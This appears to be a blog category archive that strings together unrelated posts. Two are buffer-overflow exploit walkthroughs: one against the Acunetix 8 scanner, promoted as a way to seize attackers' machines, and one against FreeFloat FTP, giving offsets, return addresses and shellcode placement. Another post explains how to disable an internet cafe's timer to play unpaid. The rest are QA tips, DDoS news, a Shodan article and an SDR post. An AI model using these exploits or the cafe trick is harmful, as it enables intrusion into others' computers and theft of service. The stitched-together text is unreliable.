Category Archives: Vulnerabilitiies

That article revealed a new vulnerability that gave attackers, the ability to perform spoofing attack.

Many people wrote to me about the problems of that kind of article (for example).

So this time I’m goanna reveal a new 0DAY that will help security managers to protect their web sites against many vulnerability scans.

A lot of sites owners will tell you that the majority numbers of scans, performed against their sites, are performed by automatic tools like NESSUS, ACUNETIX, and APPSCAN.

Today 0DAY will be focused on one of the most popular web scan in the world, ACUNETIX.

The POC will be against ACUNETIX 8 (build 20120704 since it’s one of the most common cracked version which was published in the net and used by many newbie hackers).

This disclosure will not only reveal a new vulnerability, but demonstrates a whole new perception of dealing with external attacks.

Instead of protecting your web sites again and again, or buying a new advanced WAF (web application firewall), let’s give the attackers a reason to be afraid, reason to think twice before they press the “SCAN” button.

In this article, I will not give a full working exploit for all scan scenarios nor for all operating systems, but a proof of concept that hopefully will grow into a new effort of research for vulnerabilities in Penetration test tools.

So let’s get our hands dirty

ACUNETIX is a powerful tool for scanning and finding vulnerabilities at websites.

Many newbie attackers tend to use this tool due to the simplicity of its use.

ACUNETIX offers its users a simple wizard base scan that covers many aspects of the vulnerability scan.

One of the aspects is the ability to scan more domains or sub domains related to the scanned website.
For example, if we scan my blog “http://an7isec.blogspot.co.il”, we will get the result shown below:
After a little research about this option, I figured out that ACUNETIX starts its wizard by sending an HTTP request to the site and learning about it from its HTTP response.

Furthermore the wizard learns about the external related domains from the external sources that appear at the website, for example:

“<img src=http://externalSource.com/someimg.png >”

“<a href=http://externalSource.com/ ></a>”

Etc…

Further Analysis reveals that if one of the external domain name length is more than 268 Byte’s, ACUNETIX will be crashed , so if we want to cause a crash, all we need to do is to put some kind of external source at our site, which have the length of 268 Byte’s or more, say something like this:
<A href= “http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAA”>

Quick view of this application in Immunity Debugger reveals that EDX was corrupted by the fuzzing string which caused access violation:

Despite the fact that further writing runs over the Structured Exaction Handler (SEH) as you will probably notice ,my advice for you is not to go that way, believe me I tried it for several days with no success (because of the safe SHE mechanism).

However, we have another problem with this exploit, In one word, “ASCII”.

ACUNETIX gets its information about external domains as a URL.

This fact causing the string to be converted into Web Browser friendly string.

500f = 0x66303035 : readable memory location for fixing the flow of the application that was corrupted by the buffer overflow.

]Qy~ = 0x7e79515d (JMP ESP from SXS.DLL).

OK, right now we are at the semifinal stage, running the application against above payload, produced the next result:

Yea… we landed exactly at the beginning of the final payload.

The next step will be to use suitable windows shell that will be made only from URL string (limited ASCII).

Such shell can be generated with “ Metasploit ” and it is called “Alphanumeric Shell”.

The important thing to remember while using such payload, is that the payload’s start address must be presented at one of the registers. If the payload presents at ESP, the first OP CODE of the shell need to be “PUSH ESP”.

In my Proof of concept, I used simple “CALC.EXE” shell code generated by “Metasploit that led me to the final stage which is ;working exploit!!

Moreover, our exploit is successfully bypassing DEP protection, simply by choosing only the addresses that aren’t compiled with DEP.

And due to the fact that ACUNETIX itself is not complied with DEP, this exploit should work perfectly on windows XP.

After successfully reaching all our goals, Let’s look on the final working exploit:

Following all the above, we created a powerful exploit that Newbie hackers

will definitely fall for.

This exploit will give us the ability to do everything with all that nasty Newbie hackers that scan our sites day and night, killing our traffic, filling all the web site forms with junk and so on…

Furthermore it can be used in order to collect smart intelligence about hostile forces who want to attack our web application.

BUT!!

The more powerful idea that motivated me to reveal this concept and POC, is the fact that this exploit is Anonymity killer! , because even if the attacker uses the most smart and secure proxy in the world, such as “TOR” and others, his ass will be revealed and full control on his scanning machine will be gained.
The exploit can be download from here.

Saved Return Pointer Overflows

For our first buffer overflow exploit we will be starting with the most straight forward scenario where we have a clean EIP overwrite and one of our CPU registers points directly to a large portion of our buffer. For this part we will be creating an exploit from scratch for ”FreeFloat FTP”. You can find a list of several exploits that were created for ”FreeFloat FTP” here.

Normally we would need to do badcharacter analysis but for our first tutorial we will rely on the badcharacters that are listed in the pre-existing metasploit modules on exploit-db. The characters that are listed are ”\x00\x0A\x0D”. We need to keep these characters in mind for later.

Replicating The Crash

First of all we need to create a POC skeleton exploit to crash the FTP server. Once we have that we can build on it to create our exploit. You can see my POC below, I have based it on the exploits for ”FreeFloat FTP” that I found on exploit-db. We will be using the pre-existing ”anonymous” user account which comes configured with the FTP server (the exploit should work with any valid login credentials).

Ok, so far so good, when we attach the debugger to the FTP server and send our POC buffer the program crashes. In the screenshot below you can see that EIP is overwritten and that two registers (ESP and EDI) contain part of our buffer. After analyzing both register dumps ESP seems more promising since it contains a larger chunk of our buffer (I should mention however that creating an exploit starting in EDI is certainly possible).

Registers

Overwriting EIP

Next we need to analyze our crash, to do that we need to replace our A’s with the metasploit pattern and resend our buffer. Pay attention that you keep the original buffer length since a varying buffer length may change the program crash.

When the program crashes again we see the same thing as in the screenshot above except that EIP (and both registers) is now overwritten by part of the metasploit pattern. Time to let “mona” do some of the heavy lifting. If we issue the following command in Immunity debugger we can have “mona” analyze the program crash. You can see the result of that analysis in the screenshot below.!mona findmsp

Metasploit Pattern

From the analysis we can see that EIP is overwritten by the 4-bytes which directly follow after the initial 247-bytes of our buffer. Like I said before we can also see that ESP contains a larger chunk of our buffer so it is a more suitable candidate for our exploit. Using this information we can reorganize the evil buffer in our POC above to look like this:evil = “A”*247 + “B”*4 + “C”*749
When we resend our modified buffer we can see that it works exactly as we expected, EIP is overwritten by our four B’s.

EIP = 42424242

That means that we can replace those B’s with a pointer that redirects execution flow to ESP. The only thing we need to keep in mind is that our pointer can’t contain any badcharacters. To find this pointer we can use “mona” with the following command. You can see the results in the screenshot below.!mona jmp -r esp

Pointers to ESP

It seems that any of these pointers will do, they belong to OS dll’s so they will be specific to “WinXP PRO SP3” but that’s not our primary concern. We can just use the first pointer in the list. Keep in mind that we will need to reverse the byte order due to the Little Endian architecture of the CPU. Observe the syntax below.
Pointer: 0x77c35459 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v7.0.2600.5701 (C:\WINDOWS\system32\msvcrt.dll)
Buffer: evil = “A”*247 + “\x59\x54\xC3\x77” + “C”*749
I should stress that it is important to document your exploit properly for your own and others edification. Our final stage POC should look like this.

Ok lets restart the program in the debugger and put a breakpoint on our pointer so the debugger pauses if it reaches it. As we can see in the screenshot below EIP is overwritten by our pointer and we hit our breakpoint which should bring us to our buffer located at ESP.

Breakpoint

Shellcode + Game Over

We are almost done. We need to (1) modify our POC a bit to add a variable for our shellcode and (2) insert a payload that is to our liking. Lets start with the POC, we will be inserting our payload in the part of the buffer that is now made up of C’s. Ideally we would like to have the buffer length modified dynamically so we don’t need to recalculate if we insert a payload with a different size (our total buffer length should remain 1000-bytes). We should also insert some NOP’s (No Operation Performed = \x90) before our payload as padding. You can see the result below. Any shellcode that we insert in the shellcode variable will get executed by our buffer overflow.

A very good and important point. Right? If you are a software tester or a QA engineer then you must be thinking every minute to find a bug in an application. And you should be!

I think finding a blocker bug like any system crash is often rewarding! No I don’t think like that. You should try to find out the bugs that are most difficult to find and those always misleads users.

Finding such a subtle bugs is most challenging work and it gives you satisfaction of your work. Also it should be rewarded by seniors. I will share my experience of one such subtle bug that was not only difficult to catch but was difficult to reproduce also.
I was testing one module from my search engine project. I do most of the activities of this project manually as it is a bit complex to automate. That module consist of traffic and revenue stats of different affiliates and advertisers. So testing such a reports is always a difficult task. When I tested this report it was showing the data accurately processed for some time but when tried to test again after some time it was showing misleading results. It was strange and confusing to see the results.

There was a cron (cron is a automated script that runs after specified time or condition) to process the log files and update the database. Such multiple crons are running on log files and DB to synchronize the total data. There were two crons running on one table with some time intervals. There was a column in table that was getting overwritten by other cron making some data inconsistency. It took us long time to figure out the problem due to the vast DB processes and different crons.

My point is try to find out the hidden bugs in the system that might occur for special conditions and causes strong impact on the system. You can find such a bugs with some tips and tricks.

So what are those tips:

1)Understand the whole application or module in depth before starting the testing.

2) Prepare good test cases before start to testing. I mean give stress on the functional test cases which includes major risk of the application.

3) Create a sufficient test data before tests, this data set include the test case conditions and also the database records if you are going to test DB related application.

4) Perform repeated tests with different test environment.

5) Try to find out the result pattern and then compare your results with those patterns.

6) When you think that you have completed most of the test conditions and when you think you are tired somewhat then do some monkey testing.

————

7) Use your previous test data pattern to analyse the current set of tests.

8) Try some standard test cases for which you found the bugs in some different application. Like if you are testing input text box try inserting some html tags as the inputs and see the output on display page.

9) Last and the best trick is try very hard to find the bug .As if you are testing only to break the application!

I spent some time in internet cafe, playing LAN games with my friends. We used to pay only few bucks and then play for hours for free, without getting noticed, using a little trick. You don’t need any software or hacking skills to do this trick. It’s very simple and anyone with a bit computer knowledge can do it. Lets start.

How to disable the timer on the computers in Internet Cafe and play with your friends as long as you want.

1. First of all create a new Text Document. Then write CMD in it, and then save it as anything.bat. (Make sure you’re file is .bat)

2. Now find your batch (.bat) file and run it. If you’ve done it correctly, you’ll see that CMD (Command Prompt) will open.

3. Now, write in the CMD: cd\windows (This will change the directory to WINDOWS). Then type regedit and regedit editor should open.

5. Then on the right pane where it says Disable Taskmanager, right click on it and scroll down to modify, then change the value of it to 0. Then open Task Manager (CTRL+ALT+DELETE or CTRL+SHIFT+ESCAPE) and disable the Internet Cafe’s timer.

Hackers brought down the world championships for mega-popular online game Dota 2 called The International which has a $US18 million prize money, through a Distributed Denial of Service (DDoS) attack. The hugely popular world tournament which is organised by developer of Valve Software, was brought to a crashing halt in the middle of its very first round of the second day.

PC World reports that just when things started to heat up in match one of the best-of-three competition between Evil Geniuses and compLexity Gaming, the game was suddenly struck by lag and paused soon thereafter. The DDoS attack, which was confirmed by a Dota 2 analyst on the official The International Livestream, held up the games for around a hour.

Analysts stated that since the Dota 2 matches at The International are played via the public Internet, not a local network, the tournament was prone to an outside attack.

Though PC World has stated that The International has commenced, the LiveStream still shows only the wallpaper of the tournament.

When gameplay was paused due to the DDoS attack, Dota 2 teams Evil Geniuses and compLexity Gaming were just starting their match.

The Shodan search engine can be used to find routers with exposed backdoors, unsecured webcams, and industrial control systems still using default passwords.

It’s the Google for the Internet of Things, a playground for hackers and terrorists — and, maybe, a useful tool for companies looking to lock down their own environment.

Shodan founder John Matherly launched the search engine more than five years ago as a market intelligence tool, designed to provide technology companies with information about where and how their products was being used.

[Shodan is] the Google for the Internet of Things, a playground for hackers and terrorists.

“And of course the same type of information can be queried about competitors, to better understand how they’re positioned in the market using empirical data,” said Matherly.

Since its launch, however, the search engine has taken on a life of its own, he admits.

“It has become a tool by security experts to gain a better understanding of the Internet,” he said.

The public website is actually a small piece of what Shodan offers. Enterprise clients can buy raw, real-time access to all the data it collects.

For example, a company can use Shodan to search its own networks.

“It is very common for large companies to have a random computer laying around running Telnet or having a building automation system online that wasn’t properly configured by a contractor,” he said. “And with the advent of cloud computing, I’ve seen a big increase in the number of publicly-accessible cloud servers that don’t have any authentication enabled and therefore leak their entire contents to the Internet.”

A company can also use Shodan to check the security of companies they’re considering acquiring or doing business with.

Another use of Shodan is to find the malware command and control servers used by cybercriminals, which is normally a very time-intensive process.

“However it is very straight-forward to identify them with Shodan once a fingerprint has been established,” Matherly said.

“I don’t see it as a threat,” said Leonard Jacobs, president and CEO at Minneapolis-based managed security service provider Netsecuris Inc. “For our practice, we see it as a good thing for our customers, we use it to confirm what we find through other techniques.”

In theory, a company would know about all the devices and systems it has exposed on the Internet, he said.

But sometimes, for the sake of convenience, corners are cut.

“You’ll be surprised what you’ll find out there,” he said.

A force for evil?

Shodan allows attackers to quickly identify specific devices, or specific software, on a very large scale.

“For example, every web-connected Furby could be identified quickly by going to Shodan and looking for the appropriate signature, versus the hacker having to scan the entire Internet,” said Shane MacDougall, a partner at Canadian security consultancy Tactical Intelligence Inc.

Cybercriminals, terrorists, rogue nation-states, even rival companies can use Shodan to identify critical infrastructure and cause it to malfunction, said Jean Taggart, security researcher at San Jose-based Malwarebytes Corp.

And fixing these problems isn’t always a high priority for organizations, he added.

“I worry that we won’t see movement until a serious enough event occurs,” he said. “A government-led effort to identify the owners of these devices and secure them is in high order.”

Using Shodan also means that a hacker doesn’t set off any warning bells at a targeted company.

According to Michael Baucom, vice president of R&D at Columbia, Md.-based Tangible Security, the true power of Shodan is that all the scanning has already been done — the user is simply querying the results without revealing their address or actions to the target, and with minimal effort.

“Scans of the magnitude of Shodan would take a long time and would be very noisy,” he said.

But Shodan doesn’t actually create any vulnerabilities, said Hagai Bar-El, CTO at Sansa Security, an Israel-based security firm focusing on the Internet of Things.

“It merely points them out,” he said. “Unarguably, detecting weak nodes is an important part of an attack, but hackers have been able to do this with automated crawlers, long before Shodan was developed.”

In addition, most independent security researchers agree that once a vulnerability is discovered, the public is better off if it is publicized rather than kept secret, he said.

“The public that relies on the vulnerable system has a right to be made aware of its vulnerable state,” he said. That way, they can do something about it, such as switching vendors.

“Publishing a flaw found in a commercial product is the only effective way of encouraging the vendor to actually fix it,” he added. “History is full of examples of vendors that have ignored security issues in their products for months and years until those flaws are made public.”

Meanwhile, every unfixed vulnerability is a “ticking timebomb,” he said.

But it’s not just that the bad guys already have these tools available, said Shodan’s Matherly,. The Shodan website requires that users register for an account, and only the first set of search results is free.

There are also “numerous technical measures” to prevent abuse, Matherly added.

“In reality, it is much cheaper and effective for the bad guys to use a botnet or a compromised host running [open source network scanning tools] zmap or masscan than to search Shodan.”

The project, which results in the crystal clear audio reception heard after the break, uses a whole lists of packages on a Windows box to access the emergency bands. SDRSharp, which has been popular with other DVB dongle hacks, handles the hardware work. In this case the dongle is a Newsky TV28T v2 module that he picked up for a few bucks. He’s also using some support programs including the Digital Speech Decoder which turns the data into audio.

We wonder how many areas this will work for. It was our understanding that law enforcement was moving to encrypted communications systems. But all we really know about it is that you can jam the system with a children’s toy.